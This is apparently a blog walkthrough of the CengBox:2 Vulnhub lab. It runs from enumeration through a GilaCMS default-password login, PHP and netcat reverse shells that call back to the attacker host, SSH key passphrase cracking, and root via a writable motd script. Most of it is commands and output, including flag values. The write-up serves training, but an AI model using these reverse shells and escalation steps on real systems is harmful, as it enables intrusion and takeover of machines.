[VLN] CengBox:2

Today we are going to hack the Vulnhub machine called CengBox:2. You can download it from the following link: CengBox-2

Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.103
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 22:45 CEST
Nmap scan report for cengbox.home (192.168.1.103)
Host is up (0.00033s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             209 May 23 07:21 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
|   256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_  256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
We connect to the FTP server as the anonymous user to see if there is any clue.

sml@Cassandra:~$ ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 3.0.3)
Name (192.168.1.103:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             209 May 23 07:21 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (209 bytes).
226 Transfer complete.
209 bytes received in 0.00 secs (276.1862 kB/s)
ftp>
We read the note.txt file.

sml@Cassandra:~$ cat note.txt
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.

I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.

Aaron
The note mentions a domain, so we add ceng-company.vm to /etc/hosts pointing at 192.168.1.103. We then brute-force virtual hosts to see if anything interesting turns up: gobuster's vhost mode sends each wordlist entry as the HTTP Host header and reports the names whose response differs from the default site.

sml@Cassandra:~$ gobuster vhost -u ceng-company.vm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
The virtual host admin.ceng-company.vm shows up. We add it to /etc/hosts as well and take a look at the new host.

sml@Cassandra:~$ gobuster dir -u http://admin.ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,htm,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://admin.ceng-company.vm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,htm,txt
[+] Timeout:        10s
===============================================================
2020/05/29 19:58:03 Starting gobuster
===============================================================
/server-status (Status: 403)
/gila (Status: 301)
===============================================================
2020/05/29 20:03:17 Finished
===============================================================
We find the gila directory. Browsing it, we see that it is a GilaCMS install.

Low Shell


We visit http://admin.ceng-company.vm/gila/admin and get a login form asking for a user and password. The note mentioned the user Kevin, so we guess the username kevin@ceng-company.vm. After trying the usual default passwords, the one that works is admin. So the credentials are kevin@ceng-company.vm / admin.

Next we prepare a PHP reverse shell.

sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
sml@Cassandra:~$ mv php-reverse-shell.php shell.php
sml@Cassandra:~$ nano shell.php # Edit to set our IP and port.
In GilaCMS we go to Content > File Manager and replace the contents of config.php with our reverse shell. Once it is saved, we start nc listening:

sml@Cassandra:~$ nc -nlvp 1234
And we visit: http://admin.ceng-company.vm/gila/config.php

sml@Cassandra:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 55508
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 11:47:36 up  7:48,  0 users,  load average: 0.00, 0.00, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Now that we are in, we look at what we can do.

$ sudo -l
Matching Defaults entries for www-data on cengbox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on cengbox:
    (swartz) NOPASSWD: /home/swartz/runphp.sh
Through sudo we can run one script, /home/swartz/runphp.sh, as the user swartz without a password.

$ cd /home/swartz
$ ls -la
total 44
drwxr-xr-x 4 swartz swartz     4096 May 26 05:05 .
drwxr-xr-x 4 root   root       4096 May 23 04:57 ..
-rw------- 1 swartz swartz        1 May 26 07:16 .bash_history
-rw-r--r-- 1 swartz swartz      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 swartz swartz     3771 Aug 31  2015 .bashrc
drwx------ 2 swartz swartz     4096 May 23 12:48 .cache
drwx------ 2 swartz developers 4096 May 26 05:05 .gnupg
-rw------- 1 swartz developers    1 May 26 07:16 .php_history
-rw-r--r-- 1 swartz swartz      655 May 16  2017 .profile
-rw------- 1 swartz developers    1 May 26 07:17 .viminfo
-rwxr-xr-x 1 swartz swartz       20 May 26 03:17 runphp.sh
We look at the code.

$ cat runphp.sh
#!/bin/bash
php -a
The script drops us into PHP's interactive shell (php -a) running as swartz, so we use it to get a shell as that user. We start nc listening:

nc -nlvp 5555
And to get the shell...

$ sudo -u swartz /home/swartz/runphp.sh
Interactive mode enabled

No entry for terminal type "unknown";
using dumb terminal settings.

$sock=fsockopen("192.168.1.148",5555);
exec("/bin/sh -i <&3 >&3 2>&3");
We get a shell as swartz :) The redirections <&3 >&3 2>&3 assume that the socket opened by fsockopen is file descriptor 3 in the php process, that is, the first descriptor after stdin, stdout and stderr. That holds here because php -a has nothing else open; if it did not, the exec would run but the shell would never reach our listener, and the socket would have to be handed over explicitly (for example with proc_open and a descriptor spec).

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 34744
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(swartz) gid=1002(developers) groups=1002(developers)
swartz belongs to the developers group, and that group can read the SSH keys in /home/mitnick: the listing below shows /home/mitnick and its .ssh directory are group-readable by developers, while user.txt is mode 600 and readable only by mitnick, so we need to become mitnick to read it.

$ groups
developers
$ cd /home/mitnick
$ ls -la
total 48
drwxr-x--- 4 mitnick developers 4096 May 25 13:56 .
drwxr-xr-x 4 root    root       4096 May 23 04:57 ..
-rw------- 1 mitnick mitnick       1 May 26 07:17 .bash_history
-rw-r--r-- 1 mitnick mitnick     220 May 23 03:57 .bash_logout
-rw-r--r-- 1 mitnick mitnick    3771 May 23 03:57 .bashrc
drwx------ 2 mitnick mitnick    4096 May 23 04:01 .cache
-rw------- 1 mitnick mitnick     505 May 23 06:21 .mysql_history
-rw------- 1 mitnick mitnick       1 May 26 07:18 .php_history
-rw-r--r-- 1 mitnick mitnick     655 May 23 03:57 .profile
drwxr-x--- 2 mitnick developers 4096 May 25 14:08 .ssh
-rw------- 1 mitnick mitnick       1 May 26 07:17 .viminfo
-rw------- 1 mitnick mitnick      33 May 23 13:31 user.txt
$ cd .ssh
$ ls
authorized_keys
id_rsa
id_rsa.pub
$ ls -l
total 12
-rw-r--r-- 1 mitnick developers  397 May 25 14:08 authorized_keys
-rw-r--r-- 1 mitnick developers 1766 May 25 14:07 id_rsa
-rw-r--r-- 1 mitnick developers  397 May 25 14:07 id_rsa.pub
We look at the id_rsa key.

$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,21425CA12E394F02C77645793C350D91
[key body omitted]
-----END RSA PRIVATE KEY-----
The key is encrypted (Proc-Type: 4,ENCRYPTED), so we copy it to our machine and use john to crack the passphrase. We save it as kevin.key; the file name does not matter to ssh2john or ssh, even though the key actually belongs to mitnick.

sml@Cassandra:~$ nano kevin.key
sml@Cassandra:~$ chmod 600 kevin.key
sml@Cassandra:~$ python /usr/share/john/ssh2john.py kevin.key > kevin.hash
sml@Cassandra:~$ /usr/sbin/john kevin.hash --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
legend           (kevin.key)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2020-05-29 22:31) 0.2173g/s 3117Kp/s 3117Kc/s 3117KC/s a6_123..*7¡Vamos!
Session completed
The passphrase is legend. Knowing this, we log in over SSH with the key.

user.txt



sml@Cassandra:~$ ssh -i kevin.key mitnick@192.168.1.103
Enter passphrase for key 'kevin.key': 

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

176 packages can be updated.
129 updates are security updates.

Last login: Tue May 26 07:12:16 2020 from 192.168.0.14
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.

mitnick@cengbox:~$ cat user.txt
a10333b0b7c3f914e8c446fd8e9cd362

Privilege Escalation


We download pspy64 and a static nc binary onto the box from our attacking machine.

mitnick@cengbox:~$ wget http://192.168.1.148/pspy64
mitnick@cengbox:~$ chmod +x pspy64
mitnick@cengbox:~$ wget http://192.168.1.148/nc
mitnick@cengbox:~$ chmod +x nc
We run pspy64 and, while it is running, log in again as mitnick from another terminal. On login, pam_motd runs the scripts under /etc/update-motd.d/ as root (UID=0 in the pspy output), and those scripts are writable by us. Confirm the permissions with ls -l /etc/update-motd.d/ before editing anything.

---SNIP---
2020/05/31 01:47:31 CMD: UID=0    PID=2348   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2347   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2346   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2345   | /bin/sh /etc/update-motd.d/91-release-upgrade 
2020/05/31 01:47:31 CMD: UID=0    PID=2349   | /bin/sh -e /usr/lib/ubuntu-release-upgrader/release-upgrade-motd 
---SNIP---
Knowing this, we edit /etc/update-motd.d/00-header and append the following line:

/home/mitnick/nc -e /bin/sh 192.168.1.148 3333
In another terminal we start nc listening...

sml@Cassandra:~$ nc -nlvp 3333
Finally, in a third terminal, we log in again as mitnick. The login triggers the motd scripts as root, and if everything went well we get a root shell :)

sml@Cassandra:~$ nc -nlvp 3333
listening on [any] 3333 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 52438
id
uid=0(root) gid=0(root) groups=0(root)

root.txt



cd /root
ls
root.txt
cat root.txt
  _____ ______             ____            ___  
 / ____|  ____|           |  _ \          |__ \ 
| |    | |__   _ __   __ _| |_) | _____  __  ) |
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ / / / 
| |____| |____| | | | (_| | |_) | (_) >  < / /_ 
 \_____|______|_| |_|\__, |____/ \___/_/\_\____|
                      __/ |                     
                     |___/                      

I would be grateful for your any feedback. Feel free to contact me on Twitter 
@arslanblcn_

de89782fe4e8bf2198a022ae7f50613e

End


And with that we are root on the machine :)